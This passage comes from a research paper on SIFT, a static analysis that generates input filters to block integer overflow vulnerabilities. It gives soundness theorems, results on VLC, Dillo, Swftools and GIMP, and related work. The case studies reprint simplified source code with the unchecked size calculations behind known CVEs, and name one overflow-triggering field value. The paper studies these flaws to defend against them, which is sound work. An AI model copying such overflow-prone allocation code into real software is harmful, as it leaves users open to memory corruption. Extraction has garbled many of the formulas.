We present the proof sketch of this theorem in the appendix.
Theorem 2. Given any execution trace in the original se-
mantics
⟨s0,σ0,ρ0,ς0,ρ0⟩−→⟨s1,σ1,ρ1,ς1,ρ1⟩−→···,
there is an execution trace in the abstract semantics
⟨s0,σ0,ς0, ̄h0⟩−→a⟨s1,σ1,ς1, ̄h1⟩−→a...
11 2013/8/5
readc∈Inp(f)σ′=σ[x→c]ς′=ς[x→false]
⟨l:x=read(f),σ,ς, ̄h,Inp⟩−→ a⟨nil:skip,σ′,ς′, ̄h,Inp⟩constantσ′=σ[x→c]ς′=ς[x→false]
⟨l:x=c,σ,ς, ̄h,Inp⟩−→ a⟨nil: skip,σ′,ς′, ̄h,Inp⟩
assign
⟨l:x=y,σ,ς, ̄h,Inp⟩−→ a⟨nil: skip,σ[x→σ(y)],ς[x→ς(y)], ̄h,Inp⟩if-t
⟨l:if(x)selses′,σ,ς, ̄h,Inp⟩−→ a⟨s,σ,ς, ̄h,Inp⟩
opb=ς(y)∨ς(z)∨overflow (σ(y),σ(z),op)σ′=σ[x→σ(y)opσ(z)]
⟨l:x=yopz,σ,ς, ̄h,Inp⟩−→ a⟨nil: skip,σ′,ς[x→b], ̄h,Inp⟩if-f
⟨l:if(x)selses′,σ,ς, ̄h,Inp⟩−→ a⟨s′,σ,ς, ̄h,Inp⟩
while-f
⟨l:while(x){s},σ,ς, ̄h,Inp⟩−→ a⟨nil: skip,σ,ς, ̄h,Inp⟩while-t
⟨l:while(x){s},σ,ς, ̄h,Inp⟩−→ a⟨s;while(x){s},σ,ς, ̄h,Inp⟩
seq-1
⟨nil: skip ;s,σ,ς, ̄h,Inp⟩−→ a⟨s,σ,ς, ̄h,Inp⟩seq-2⟨s,σ,ς, ̄h,Inp⟩−→ a⟨s′′,σ′,ς′, ̄h′,Inp⟩
⟨s;s′,σ,ς, ̄h,Inp⟩−→ a⟨s′′;s′,σ′,ς, ̄h′,Inp⟩
malloc
⟨l:p=malloc,σ,ς, ̄h,Inp⟩−→ a⟨nil: skip,σ,ς, ̄h,Inp⟩load(c,b)∈ ̄h(l)σ′=σ[x→c]ς′=ς[x→b]
⟨l:x=∗p,σ,ς, ̄h,Inp⟩−→ a⟨nil: skip,σ′,ς′, ̄h,Inp⟩
store ̄h′satisfies (*)
⟨l:∗p=x,σ,ς, ̄h,Inp⟩−→ a⟨nil: skip,σ,ς, ̄h′,Inp⟩
∀lload∈LoadLabel : ̄h′(lload) =

 ̄h(lload) no_alias (l,lload)
{(σ(x),ς(x))} ¬no_alias (l,lload)∧must _alias (l,lload)
{(σ(x),ς(x))}∪ ̄h(lload)¬no_alias (l,lload)∧¬must _alias (l,lload)(*)
Figure 11. The small step abstract semantics. “nil" is a special label reserved by the semantics.
such that the following conditions hold
∀i∀x∈Var
(σi(x)∈Int→(σi(x) =σi(x)∧ςi(x) =ςi(x)))(1)
∀i,first (si)=l,l∈LoadLabel,left (si)=“l:x=∗p”
(ρi(σi(p))∈Int→(ρi(σi(p)),ρi(σi(p)))∈ ̄hi(l))(2)
whereleft(s)denotes an utility function that returns the
leftmost statement in sifsis a sequential composite and
returnssifsis not a sequential composite.
The intuition of Condition 1 is that σiandσias well
asςiandςialways agree on the variables holding integer
values. The intuition of Condition 2 is that  ̄hi(l)corresponds
to the possible values that the corresonding load statement of
the labellmay obtain from the memory. Thus when a load
statement is executed, the obtained integer value should be
in the corresponding set in  ̄hi.
4.5 Soundness of the Analysis
Evaluation of the Condition C:Our static analysis main-
tains and propagates the symbolic condition C. Figure 12 de-
fines the evaluation rules of the symbolic condition Cover
the abstract program states. We use (σ,ς, ̄h,Inp )|=Cto
denote that the abstract program state (σ,ς, ̄h,Inp )satisfies
the condition C.
Note that the evaluation rule for safe (e1ope2)not only
ensures that the overflow error does not occur at the last
computation step, but also ensures no overflow error occurs
in sub-computations recursively.
Also note that, intuitively, atoms in the form of f(id)
andl(id)correspond to a set of possible values from aninput field or a load statement ( Inp(f)or ̄h(l)). Thus the
evaluation rules enumerate all possible value bindings and
make sure that each value binding satisfies the condition.
The definition of the evaluation rules also indicates the
normalization algorithm in Section 3.2 that renumbers ids in
a symbolic condition Cdoes not change the semantic mean-
ing of the condition. Therefore for a given symbolic condi-
tionC, the normalization algorithm produces an equivalent
conditionnorm (C).
Soundness of the Analysis over the Abstract Semantics:
We formally state the soundness of our analysis over the
abstract semantics as follows.
Theorem 3. Given a series of statements si, a pro-
gram point l∈labels (si)and a start condition C, our
analysis generates a condition F(si,l,C)such that if
(σi,ςi, ̄hi,Inp)|=F(si,l,C), then⟨si,σi,ςi, ̄hi⟩ −→∗
a
⟨sj−1,σj−1,ςj−1, ̄hj−1⟩ −→ a⟨sj,σj,ςj, ̄hj⟩ ∧
first (sj−1) =limplies (σj,ςj, ̄hj,Inp)|=C.
This guarantees that if the abstract program state before
executingsisatisfiesF(si,l,C), then the abstract program
state at the program point after the statement of the label
lwill always satisfy C(“−→∗
a”represents to execute
the program for an arbitrary number of steps in the abstract
semantics).
Soundness of the Analysis over the Original Semantics:
Because of the consistency of the abstract semantics and the
original semantics (see Section 4.3), we can derive the fol-
lowing soundness property of our analysis over the original
12 2013/8/5
∀c∈Inp(f): (σ,ς, ̄h,Inp )|=C[c/f(id)]
(σ,ς, ̄h,Inp )|=C∀(c,b)∈ ̄h(l): (σ[tmp→c],ς[tmp→b], ̄h,Inp )|=C[tmp/l (id)]tmp is fresh inC
(σ,ς, ̄h,Inp )|=C
(σ,ς, ̄h,Inp )|=C(σ,ς, ̄h,Inp )|=safe(e)
(σ,ς, ̄h,Inp )|=C∧safe(e)(σ,ς, ̄h,Inp )|=safe(e1)∧safe(e2)overflow ([[e1]](σ),[[e2]](σ),op) = false
(σ,ς, ̄h,Inp )|=safe(e1ope2)
ς(x) =false
(σ,ς, ̄h,Inp )|=safe(x)[[c]](σ) =c [[x]](σ) =σ(x) [[ e1ope2]](σ) = [[e1]](σ)op[[e2]](σ)
Figure 12. Condition evaluation rules.
semantics based on the soundness property over the abstract
semantics:
Theorem 4. Given a program s0, a program point l∈
labels (s0), and a program variable v, our analysis gen-
erates a condition C=F(s0,l,safe(v))such that if
(σ0,ς0, ̄h0,Inp)|=C, then⟨s0,σ0,ρ0,ς0,ρ0⟩ −→∗
⟨sn−1,σn−1,ρn−1,ςn−1,ρn−1⟩−→⟨sn,σn,ρn,ςn,ρn⟩∧
first (sn−1) =l∧σn(v)∈Int impliesςn(v) =false.
This guarantees that if the input satisfies the generated
conditionC(note thatσ0,ς0, and  ̄h0are predefined con-
stant initial state in Section 4.3), then for any execution in
the original semantics ( “−→∗”represents to execute the
program for an arbitrary number of steps in the original se-
mantics), at the program point after the statement of the label
l, as long as the variable vholds an integer value (not an un-
defined value due to unintialized access), the computation
history for obtaining this integer value contains no overflow
error.
5. Experimental Results
We evaluate SIFT on modules from five open source ap-
plications: VLC 0.8.6h (a network media player), Dillo 2.1
(a lightweight web browser), Swfdec 0.5.5 (a flash video
player), Swftools 0.9.1 (SWF manipulation and generation
utilities), and GIMP 2.8.0 (an image manipulation applica-
tion). Each application uses a publicly available input format
specification and contains at least one known integer over-
flow vulnerability (described in either the CVE database or
the Buzzfuzz paper [13]). All experiments were conducted
on an Intel Xeon X5363 3.00GHz machine running Ubuntu
12.04.
5.1 Methodology
Input Format and Module Selection: For each application,
we used SIFT to generate filters for the input format that trig-
gers the known integer overflow vulnerability. We therefore
ran SIFT on the module that processes inputs in that format.
The generated filters nullify not only the known vulnerabil-
ities, but also any integer overflow vulnerabilities at any of
the 52 memory allocation or block copy sites in the modulesApplication Distinct Fields Relevant Fields
VLC 25 2
Dillo 47 3
Swfdec 219∗6
png2swf 47 4
jpeg2swf 300 2
GIMP 189 2
Figure 13. The number of distinct input fields and the num-
ber of relevant input fields for analyzed input formats. (*)
For Swfdec the second column shows the number of distinct
fields in embedded JPEG images in collected SWF files.
for which SIFT was able to generate symbolic conditions
(recall that there are 58 critical sites in these modules in to-
tal).
Input Statement Annotation: After selecting each module,
we added annotations to identify the input statements that
read relevant input fields (i.e., input fields that may affect
the values of critical expressions at memory allocation or
block copy sites). Figure 13 presents, for each module, the
total number of distinct fields in our collected inputs for each
format, the number of annotated input statements (in all of
the modules the number of relevant fields equals the number
of annotated input statements — each relevant field is read
by a single input statement). We note that the number of
relevant fields is significantly smaller than the total number
of distinct fields (reflecting the fact that typically only a
relatively small number of fields in each input format may
affect the sizes of allocated or copied memory blocks).
The maximum amount of time required to annotate any
module was approximately half an hour (Swfdec). The total
annotation time required to annotate all benchmarks, includ-
ing Swfdec, was less than an hour. This annotation effort
reflects the fact that, in each input format, there are only a
relatively small number of relevant input fields.
Filter Generation and Test: We next used SIFT to generate
a single composite input filter for each analyzed module. We
then downloaded at least 6000 real-world inputs for each
input format, and ran all of the downloaded inputs through
13 2013/8/5
the generated filters. There were no false positives (the filters
accepted all of the inputs).
Vulnerability and Filter Confirmation: For each known
integer overflow vulnerability, we collected a test input that
triggered the integer overflow. We confirmed that each gen-
erated composite filter, as expected, discarded the input be-
cause it correctly recognized that the input would cause an
integer overflow.
5.2 Analysis and Filter Evaluation
Figure 14 presents static analysis and filter generation re-
sults. This figure contains a row for each analyzed mod-
ule. The first column (Application) presents the application
name, the second column (Module) identifies the analyzed
module within the application. The third column (# of IR)
presents the number of analyzed statements in the LLVM
intermediate representation. This number of statements in-
cludes not only statements directly present in the module,
but also statements from analyzed code in other modules in-
voked by the original module.
The fourth column (Total) presents the total number of
memory allocation and block copy sites in the analyzed
module. The fifth column (Input Relevant) presents the num-
ber of memory allocation and block copy sites in which the
size of the allocated or copied block depends on the values
of input fields. For these modules, the sizes at 49 of the 58
sites depend on the values of input fields. The sizes at the re-
maining nine sites are unconditionally safe — SIFT verifies
that they depend only on constants embedded in the program
(and that there is no overflow when the sizes are computed
from these constants).
The sixth column (Inside Loop) presents the number of
memory allocation and block copy sites in which the size
parameter depends on variables that occurred inside loops.
For these modules, the sizes at 29 of the 58 sites depend on
loops relevant variables, for which SIFT needs to compute
loop invariants to generate input filters.
The seventh column (Max Condition Size) presents, for
each application module, the maximum number of conjunts
in any symbolic condition that occurs in the analysis of that
module. The conditions are reasonably compact (and more
than compact enough to enable an efficient analysis) — the
maximum condition size over all modules is less than 500.
The final column (Analysis Time) presents the time re-
quired to analyze the module and generate a single compos-
ite filter for all of the successfully analyzed critical sites. The
analysis times for all modules are less than a second.
SIFT is unable to generate symbolic conditions for 6 of
the 58 call sites. For two of these sites (one in Swfdec and
one in png2swf), the two expressions contain subexpres-
sions whose value depends on an unbounded number of val-
ues from loop iterations. To analyze such expressions, ourApplication Format # of Input Average Time
VLC WA V 10976 3ms (3ms)
Dillo PNG 18983 16ms (16ms)
Swfdec SWF 7240 6ms (5ms)
png2swf PNG 18983 16ms (16ms)
jpeg2swf JPEG 6049 4ms (4ms)
GIMP GIF 19647 9ms (9ms)
Figure 15. Generated Filter Results.
1#define __EVEN( x ) (((x)%2 != 0 ) ? ((x)+1) : (x))
2
3static int Open( vlc_object_t *p_this ) {
4 ...
5 // search format chunk and read its size
6 if( ChunkFind( p_demux, "fmt ", &i_size ) )
7 {
8 msg_Err( p_demux, "cannot find ’fmt ’ chunk" );
9 goto error;
10 }
11 /*i_size = SIFT_input("fmt_size", 32); */
12 ...
13 // where integer overflow happens.
14 p_wf_ext = malloc( __EVEN( i_size ) + 2 );
15 }
Figure 17. The simplified source code from VLC with an-
notations inside comments.
analysis currently requires an upper bound on the number
of loop iterations. Such an upper bound could be provided,
for example, by additional analysis or developer annotations.
The remaining four expressions (two in png2swf and two in
jpeg2swf) depend on the return value from strlen() . SIFT is
not currently designed to analyze such expressions.
For each input format, we used a custom web crawler
to locate and download at least 6000 inputs in that format.
The web crawler starts from a Google search page for the
file extension of the specific input format, then follows links
in each search result page to download files in the correct
format.
Figure 15 presents, for each generated filter, the number
of downloaded input files and the average time required to
filter each input. We present the average times in the form
Xms (Yms), where Xms is the average time required to filter
an input and Yms is the average time required to read in the
input (but not apply the integer overflow check). These data
show that essentially all of the filter time is spent reading in
the input.
5.3 Vulnerability Case Studies
In Section 2 we showed how SIFT handles the integer
overflow vulnerability in Swfdec. We next investigate how
SIFT handles the remaining five known vulnerabilities in
our benchmark applications. Figure 16 presents the symbolic
conditions that SIFT generates for each of the five vulnera-
bilities in the analyzed modules.
5.3.1 VLC
14 2013/8/5
Application Module # of IR Total Input Relevant Inside Loop Max Condition Size Analysis Time
VLC demux/wav.c 1.5k 5 3 0 2 <0.1s
Dillo png.c 39.1k 4 3 3 410 0.8s
Swfdec jpeg/*.c 8.4k 22 19 2 144 0.2s
png2swf all 11.0k 21 18 18 16 0.2s
jpeg2swf all 2.5k 4 4 4 2 <0.1s
GIMP file-gif-load.c 3.2k 2 2 2 2 <0.1s
Figure 14. Static Analysis and Filter Generation Results
VLC safe((fmt _size[32]+ 1[32]) + 2[32])∧safe(fmt _size[32]+ 2[32])
png2swf∧4
c=1safe((c[32]×png_width[32])×png_height[32]+ 65536[32])
jpeg2swf safe((jpeg _width[32]×jpeg _height[32])×4[32])
Dillo∧4
c=1(safe(((png_width[32]×(c[32]×sext(png_bitdepth[8],32)) + 7[32])>>3[32])×png_height ht[32])∧
safe(png_width[32]×((c[32]×sext(png_bitdepth[8],32))>>3[32])×png_height[32]))
GIMP safe((gif_width[32]×gif_height[32])×2[32])∧safe(gif_width[32]×gif_height[32]×4[32])
Figure 16. The symbolic condition Cin the bit vector form for VLC, Swftools-png2swf, Swftools-jpeg2swf, Dillo and GIMP.
The superscript indicates the bit width of each expression atom. “ sext(v,w)" is the signed extension operation that transforms
the valuevto the bit width w.
The VLC wav.c module contains an integer overflow
vulnerability (CVE-2008-2430) when parsing WA V sound
inputs. Figure 17 presents (a simplified version of) the source
code that is related to this error. When VLC parses the
format chunk of a WA V input, it first reads the input field
fmt_size, which indicates the size of the format chunk (line
6). VLC then allocates a buffer to hold the format chunk
(line 14 in Figure 17). A large fmt_size field value (for
example, 0xfffffffe) will cause an overflow to occur when
VLC computes the buffer size.
We annotate the source code to specify where the module
reads thefmt_size input field (line 11). SIFT then analyzes
the module to obtain the symbolic condition C(Figure 16),
which soundly summarizes how VLC computes the buffer
size from input fields.
5.3.2 Dillo
Dillo contains an integer overflow vulnerability (CVE-
2009-2294) in its png module. Figure 18 presents the sim-
plified source code for this example. Dillo uses the libpng
library to read PNG images. The libpng runtime calls
png_process_data() (line 2) to process each PNG image.
This function then calls png_push_read_chunk() (line
11) to process each chunk in the PNG image. When the
libpng runtime reads the first data chunk (the IDAT chunk),
it calls the Dillo callback png_datainfo_callback() (lines
66-75) in the Dillo PNG processing module. There is an in-
teger overflow vulnerability at line 73 where Dillo calcu-
lates the size of the image buffer as png->rowbytes*png-
>height . On a 32-bit machine, inputs with large width and
height fields can cause the image buffer size calculation tooverflow. In this case Dillo allocates an image buffer that is
smaller than required and eventually writes beyond the end
of the allocated buffer.
Figure 16 presents the symbolic condition Cfor Dillo.
Csoundly takes intermediate computations over all execu-
tion paths into consideration, including the switch branch at
lines 45-59 that sets the variable png_ptr->channels and
PNG_ROWBYTES macro at lines 26-29. Note that the
constantc[32]inCcorresponds to the possible values of
png_ptr->channels , which are between 1 and 4.
5.3.3 Swftools
Swftools is a set of utilities for creating and manipulat-
ing SWF files. Swftools contains two tools png2swf and
jpeg2swf, which transform PNG and JPEG images to SWF
files. Each of these two tools contains an integer overflow
vulnerability (CVE-2010-1516).
Figure 19 presents (a simplified version of) the source
code that contains the png2swf vulnerability. When pro-
cessing PNG images, Swftools calls getPNG() (lines 20-
43) atpng2swf.c:763 to read the PNG image into memory.
getPNG() first calls png_read_header() (lines 1-18) to
locate and read the header chunk which contains the PNG
metadata. It then uses the metadata information to calcu-
late the length of the image data at png.h:502 (lines 39-40).
There is no bounds check on the width and the height value
from the header chunk before this calculation. On a 32-bit
machine, a PNG image with large width and height values
will trigger the integer overflow error.
We annotate lines 7 and 10 the statements that read in-
put fields png_width andpng_height and use SIFT to de-
15 2013/8/5
1// libpng main data process function.
2void png_process_data(png_structp png_ptr,
3 png_infop info_ptr, ...) {
4 ...
5 while (png_ptr->buffer_size) {
6 // This is a wrapper for png_push_read_chunk
7 png_process_some_data(png_ptr, info_ptr);
8 }
9}
10 // chunk handler dispatcher
11 void png_push_read_chunk(png_structp png_ptr,
12 png_infop info_ptr) {
13 if(!png_memcmp(png_ptr->chunk_name,png_IHDR,4)){
14 ...
15 png_handle_IHDR(png_ptr, info_ptr, ...);
16 }
17 ...
18 else if (!png_memcmp(png_ptr->chunk_name,
19 png_IDAT, 4)) {
20 ...
21 // Datainfo callback is called
22 png_push_have_info(png_ptr, info_ptr);
23 ...
24 }
25 }
26 #define PNG_ROWBYTES(pixel_bits,width)\
27 ((pixel_bits)>=8?\
28 ((width) *(((png_uint_32)(pixel_bits))>>3)):\
29 ((((width) *((png_uint_32)(pixel_bits)))+7)>>3))
30 void png_handle_IHDR(png_structp png_ptr,
31 png_infop info_ptr, ...) {
32 ...
33 // read individual png fields from input buffer
34 width = png_get_uint_31(png_ptr, buf);
35 /*width = SIFT_input("png_width", 32); */
36 height = png_get_uint_31(png_ptr, buf + 4);
37 /*height = SIFT_input("png_height", 32); */
38 bit_depth = buf[8];
39 /*bit_depth = SIFT_input("png_bitdepth", 8); */
40 ...
41 png_ptr->width = width;
42 png_ptr->height = height;
43 png_ptr->bit_depth = (png_byte)bit_depth;
44 ...
45 switch (png_ptr->color_type) {
46 case PNG_COLOR_TYPE_GRAY:
47 case PNG_COLOR_TYPE_PALETTE:
48 png_ptr->channels = 1;
49 break ;
50 case PNG_COLOR_TYPE_RGB:
51 png_ptr->channels = 3;
52 break ;
53 case PNG_COLOR_TYPE_GRAY_ALPHA:
54 png_ptr->channels = 2;
55 break ;
56 case PNG_COLOR_TYPE_RGB_ALPHA:
57 png_ptr->channels = 4;
58 break ;
59 }
60 png_ptr->pixel_depth = (png_byte)(
61 png_ptr->bit_depth *png_ptr->channels);
62 png_ptr->rowbytes = PNG_ROWBYTES(
63 png_ptr->pixel_depth, png_ptr->width);
64 }
65 // Dillo datainfo initialization callback
66 static void Png_datainfo_callback(png_structp png_ptr,
67 ...) {
68 DilloPng *png;
69 png = png_get_progressive_ptr(png_ptr);
70 ...
71 // where the overflow happens
72 png->image_data = ( uchar_t *) dMalloc(
73 png->rowbytes *png->height);
74 ...
75 }
Figure 18. The simplified source code from Dillo and
libpng with annotations inside comments.1static int png_read_header( FILE *fi,
2 struct png_header *header) {
3 ...
4 while (png_read_chunk(&id, &len, &data, fi)) {
5 if(!strncmp(id, "IHDR", 4)) {
6 ...
7 header->width = data[0]<<24|data[1]<<16|
8 data[2]<<8|data[3];
9 /*header->width=SIFT_input("png_width",32); */
10 header->height = data[4]<<24|data[5]<<16|
11 data[6]<<8|data[7];
12 /*header->height=SIFT_input("png_height",32); */
13 ...
14 }
15 ...
16 }
17 ...
18 }
19
20 EXPORT int getPNG( const char *sname, int*destwidth,
21 int*destheight, unsigned char **destdata) {
22 ...
23 unsigned long int imagedatalen;
24 ...
25 if(!png_read_header(fi, &header)) {
26 fclose(fi);
27 return 0;
28 }
29 ...
30 if(header.mode==3 || header.mode==0) bypp = 1;
31 else if (header.mode == 4) bypp = 2;
32 else if (header.mode == 2) bypp = 3;
33 else if (header.mode == 6) bypp = 4;
34 else {
35 ...
36 return 0;
37 }
38
39 imagedatalen = bypp *header.width *
40 header.height + 65536;
41 imagedata = ( unsigned char *)malloc(imagedatalen);
42 ...
43 }
Figure 19. The simplified source code from png2swf in
swftools with annotations inside comments.
rive the symbolic condition for this vulnerability. Figure 16
presents the symbolic condition C.
jpeg2swf contains a similar integer overflow vulnera-
bility when processing JPEG images. At jpeg2swf.c:171
jpeg2swf first calls the libjpeg API to read jpeg image. At
jpeg2swf.c:173 , jpeg2swf then immediately calculates the
size of a memory buffer for holding the jpeg file in its own
data structure. Because it directly uses the input width and
height values in the calculation without range checks, large
width and height values may cause overflow errors. Fig-
ure 16 presents the symbolic expression condition Cfor
jpeg2swf.
5.3.4 GIMP
GIMP contains an integer overflow vulnerability (CVE-
2012-3481) in its GIF loading plugin file-gif-load.c . When
GIMP opens a GIF file, it calls load_image atfile-gif-
load.c:335 to load the entire GIF file into memory. For each
individual image in the GIF file, this function first reads the
16 2013/8/5
image metadata information, then calls ReadImage to pro-
cess the image. At file-gif-load.c:1064 , the plugin calculates
the size of the image output buffer as a function of the prod-
uct of the width and height values from the input. Because it
uses these values directly without range checks, large height
and width fields may cause an integer overflow. In this case
GIMP may allocate a buffer smaller than the required size.
We annotate the source code based on the GIF specifica-
tion and use SIFT to derive the symbolic condition for this
vulnerability. Figure 16 presents the generated symbolic ex-
pression condition C.
5.4 Discussion
The experimental results highlight the combination of prop-
erties that, together, enable SIFT to effectively nullifying
potential integer overflow errors at memory allocation and
block copy sites. SIFT is efficient enough to deploy in pro-
duction on real-world modules (the combined program anal-
ysis and filter generation times are always under a second),
the analysis is precise enough to successfully generate in-
put filters for the majority of memory allocation and block
copy sites, the results provide encouraging evidence that the
generated filters are precise enough to have few or even no
false positives in practice, and the filters execute efficiently
enough to deploy with acceptable filtering overhead.
6. Related Work
Weakest Precondition: Madhavan et. al. present an approx-
imate weakest precondition analysis to verify the absence of
null dereference errors in Java programs [21]. The under-
lying analysis domain tracks whether or not variables may
contain null references. To obtain acceptable precision for
the null dereference verification problem, the technique in-
corporates null-dereference checks from conditional state-
ments into the propagated conditions.
Because SIFT focuses on integer overflow errors, the un-
derlying analysis domain (symbolic arithmetic expressions)
and propagation rules are significantly more complex. SIFT
also does not incorporate checks from conditional state-
ments, a design decision that, for the integer overflow prob-
lem, produces efficient and accurate filters. Also the prob-
lems are different — SIFT generates filters to eliminate se-
curity vulnerabilities, while Madhavan et. al. focus on veri-
fying the absence of null dereferences.
Flanagan et. al. presents a general intraprocedural weak-
est precondition analysis for generating verification condi-
tions for ESC/JA V A programs [12]. SIFT differs in that it fo-
cuses on integer overflow errors. Because of this focus, SIFT
can synthesize its own loop invariants (Flanagan et. al. rely
on developer-provided invariants). In addition, SIFT is inter-
procedural, and uses the analysis results to generate sound
filters that nullify integer overflow errors.Anomaly Detection: Anomaly detection techniques gener-
ate (unsound) input filters by empirically learning proper-
ties of successfully or unsuccessfully processed inputs [14,
16, 19, 23, 25, 26, 30, 31]. Web-based anomaly detec-
tion [16, 26] uses input features (e.g. request length and char-
acter distributions) from attack-free HTTP traffic to model
normal behaviors. HTTP requests that contain features that
violate the model are flagged as anomalous and dropped.
Similarly, Valeur et al [30] propose a learning-based ap-
proach for detecting SQL-injection attacks. Wang et al [31]
propose a technique that detects network-based intrusions by
examining the character distribution in payloads. Perdisci et
al [25] propose a clustering-based anomaly detection tech-
nique that learns features from malicious traces (as opposed
to benign traces). Input rectification learns properties of in-
puts that the application processes successfully, then mod-
ifies inputs to ensure that they satisfy the learned proper-
ties [20].
Two key differences between SIFT and these techniques
are that SIFT statically analyzes the application, not its in-
puts, and takes all execution paths into account to generate a
sound filter.
Static Analysis for Finding Integer Errors: Several static
analysis tools have been proposed to find integer errors [6,
27, 32]. KINT [32], for example, analyzes individual pro-
cedures, with the developer optionally providing procedure
specifications that characterize the value ranges of the pa-
rameters. KINT also unsoundly avoids the loop invariant
synthesis problem by replacing each loop with the loop body
(in effect, unrolling the loop once). Despite substantial ef-
fort, KINT reports a large number of false positives [32].
SIFT addresses a different problem: it is designed to nul-
lify, not detect, overflow errors. In pursuit of this goal, it uses
an interprocedural analysis, synthesizes symbolic loop in-
variants, and soundly analyzes all execution paths to produce
a sound filter.
Symbolic Test Generation: DART [15] and KLEE [5] use
symbolic execution to automatically generate test cases that
can expose errors in an application. IntScope [29] and Smart-
Fuzz [22] are symbolic execution systems specifically for
finding integer errors. It would be possible to combine these
systems with previous input-driven filter generation tech-
niques to obtain filters that discard inputs that take the dis-
covered path to the error. As discussed previously, SIFT dif-
fers in that it considers all possible paths so that its gener-
ated filters come with a soundness guarantee that if an input
passes the filter, it will not exploit the integer overflow error.
Runtime Check and Library Support: To alleviate the
problem of false positives, several research projects have
focused on runtime detection tools that dynamically insert
runtime checks before integer operations [3, 7, 11, 34]. An-
other similar technique is to use safe integer libraries such as
17 2013/8/5
SafeInt [18] and CERT’s IntegerLib [28] to perform sanity
checks at runtime. Using these libraries requires that devel-
opers rewrite existing code to use safe versions of integer
operations.
However, the inserted code typically imposes non-
negligible overhead. When integer errors happen in the mid-
dle of the program execution, these techniques usually raise
warnings and terminate the execution, which effectively turn
integer overflow attacks into DoS attacks. SIFT, in contrast,
inserts no code into the application and blocks inputs that
exploit integer overflow vulnerabilities to avoid the attacks
completely.
Benign Integer Overflows: In some cases, developers may
intentionally write code that contains benign integer over-
flows [29, 32]. A potential concern is that techniques that
nullify overflows may interfere with the intended behavior
of such programs [29, 32]. Because SIFT focuses on critical
memory allocation and block copy sites that are unlikely to
have such intentional integer overflows, SIFT is unlikely to
nullify benign integer overflows and therefore unlikely inter-
fere with the intended behavior of the program.
7. Conclusion
Integer overflow errors can lead to security vulnerabilities.
SIFT analyzes how the application computes integer values
that appear at memory allocation and block copy sites to
generate input filters that discard inputs that may trigger
overflow errors in these computations. Our results show that
SIFT can quickly generate efficient and precise input filters
for the vast majority of memory allocation and block copy
call sites in our analyzed benchmark modules.
References
[1] Hachoir. http://bitbucket.org/haypo/
hachoir/wiki/Home .
[2] The LLVM compiler infrastructure. http://www.llvm.
org/ .
[3] D. Brumley, T. Chiueh, R. Johnson, H. Lin, and D. Song.
Rich: Automatically protecting against integer-based vulner-
abilities. Department of Electrical and Computing Engineer-
ing, page 28, 2007.
[4] D. Brumley, H. Wang, S. Jha, and D. Song. Creating vulnera-
bility signatures using weakest preconditions. In Proceedings
of the 20th IEEE Computer Security Foundations Symposium ,
CSF ’07’, pages 311–325, Washington, DC, USA, 2007. IEEE
Computer Society.
[5] C. Cadar, D. Dunbar, and D. Engler. Klee: unassisted and
automatic generation of high-coverage tests for complex sys-
tems programs. In Proceedings of the 8th USENIX conference
on Operating systems design and implementation , OSDI’08,
pages 209–224, Berkeley, CA, USA, 2008. USENIX Associ-
ation.[6] E. Ceesay, J. Zhou, M. Gertz, K. Levitt, and M. Bishop. Using
type qualifiers to analyze untrusted integers and detecting
security flaws in c programs. Detection of Intrusions and
Malware & Vulnerability Assessment , pages 1–16, 2006.
[7] R. Chinchani, A. Iyer, B. Jayaraman, and S. Upadhyaya.
Archerr: Runtime environment driven program safety. Com-
puter Security–ESORICS 2004 , pages 385–406, 2004.
[8] M. Costa, M. Castro, L. Zhou, L. Zhang, and M. Peinado.
Bouncer: securing software by blocking bad input. In Pro-
ceedings of twenty-first ACM SIGOPS symposium on Operat-
ing systems principles , SOSP ’07. ACM, 2007.
[9] M. Costa, J. Crowcroft, M. Castro, A. Rowstron, L. Zhou,
L. Zhang, and P. Barham. Vigilante: end-to-end containment
of internet worms. In Proceedings of the twentieth ACM sym-
posium on Operating systems principles , SOSP ’05. ACM,
2005.
[10] W. Cui, M. Peinado, and H. J. Wang. Shieldgen: Automatic
data patch generation for unknown vulnerabilities with in-
formed probing. In Proceedings of 2007 IEEE Symposium
on Security and Privacy . IEEE Computer Society, 2007.
[11] W. Dietz, P. Li, J. Regehr, and V . Adve. Understanding integer
overflow in c/c++. In Proceedings of the 2012 International
Conference on Software Engineering , pages 760–770. IEEE
Press, 2012.
[12] C. Flanagan and J. B. Saxe. Avoiding exponential explosion:
generating compact verification conditions. In Proceedings of
the 28th ACM SIGPLAN-SIGACT symposium on Principles
of programming languages , POPL ’01’, pages 193–205, New
York, NY , USA, 2001. ACM.
[13] V . Ganesh, T. Leek, and M. Rinard. Taint-based directed
whitebox fuzzing. In ICSE ’09: Proceedings of the 31st In-
ternational Conference on Software Engineering . IEEE Com-
puter Society, 2009.
[14] D. Gao, M. K. Reiter, and D. Song. On gray-box program
tracking for anomaly detection. In Proceedings of the 13th
conference on USENIX Security Symposium - Volume 13 ,
SSYM’04. USENIX Association, 2004.
[15] P. Godefroid, N. Klarlund, and K. Sen. Dart: directed au-
tomated random testing. In Proceedings of the 2005 ACM
SIGPLAN conference on Programming language design and
implementation , PLDI ’05, pages 213–223, New York, NY ,
USA, 2005. ACM.
[16] C. Kruegel and G. Vigna. Anomaly detection of web-based
attacks. In Proceedings of the 10th ACM conference on Com-
puter and communications security , CCS ’03. ACM, 2003.
[17] C. Lattner, A. Lenharth, and V . Adve. Making context-
sensitive points-to analysis with heap cloning practical for the
real world. In Proceedings of the 2007 ACM SIGPLAN confer-
ence on Programming language design and implementation ,
PLDI ’07, pages 278–289, New York, NY , USA, 2007. ACM.
[18] D. LeBlanc. Integer handling with the c++ safeint class.
urlhttp://msdn. microsoft. com/en-us/library/ms972705 , 2004.
18 2013/8/5
[19] F. Long, V . Ganesh, M. Carbin, S. Sidiroglou, and M. Rinard.
Automatic input rectification. ICSE ’12, 2012.
[20] F. Long, V . Ganesh, M. Carbin, S. Sidiroglou, and M. Rinard.
Automatic input rectification. In Proceedings of the 2012 In-
ternational Conference on Software Engineering , ICSE 2012,
pages 80–90, Piscataway, NJ, USA, 2012. IEEE Press.
[21] R. Madhavan and R. Komondoor. Null dereference verifica-
tion via over-approximated weakest pre-conditions analysis.
InProceedings of the 2011 ACM international conference on
Object oriented programming systems languages and applica-
tions , OOPSLA ’11, pages 1033–1052, New York, NY , USA,
2011. ACM.
[22] D. Molnar, X. C. Li, and D. A. Wagner. Dynamic test genera-
tion to find integer bugs in x86 binary linux programs. Usenix
Security’09.
[23] D. Mutz, F. Valeur, C. Kruegel, and G. Vigna. Anomalous
system call detection. ACM Transactions on Information and
System Security , 9, 2006.
[24] J. Newsome, D. Brumley, and D. X. Song. Vulnerability-
